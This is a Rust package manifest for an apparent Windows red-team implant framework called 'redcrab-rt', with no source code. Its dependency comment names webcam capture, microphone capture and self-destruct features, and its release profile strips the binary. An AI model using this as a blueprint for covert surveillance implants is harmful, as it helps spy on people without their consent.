[package]
name        = "redcrab-rt"
version     = "0.1.0"
edition     = "2021"
description = "Windows x64 red team implant framework — authorized engagement tooling"

[[bin]]
name = "redcrab"
path = "src/main.rs"

[profile.release]
opt-level     = "z"
lto           = true
codegen-units = 1
panic         = "abort"
strip         = true
debug         = false

[dependencies]
# windows-rs for Media Foundation (webcam) + WASAPI (mic) + self-destruct
windows = { version = "0.58", features = [
    "Win32_Media_MediaFoundation",
    "Win32_Media_Audio",
    "Win32_System_Com",
    "Win32_Foundation",
    "Win32_Storage_FileSystem",
    "Win32_System_Threading",
    "Win32_Security",
] }
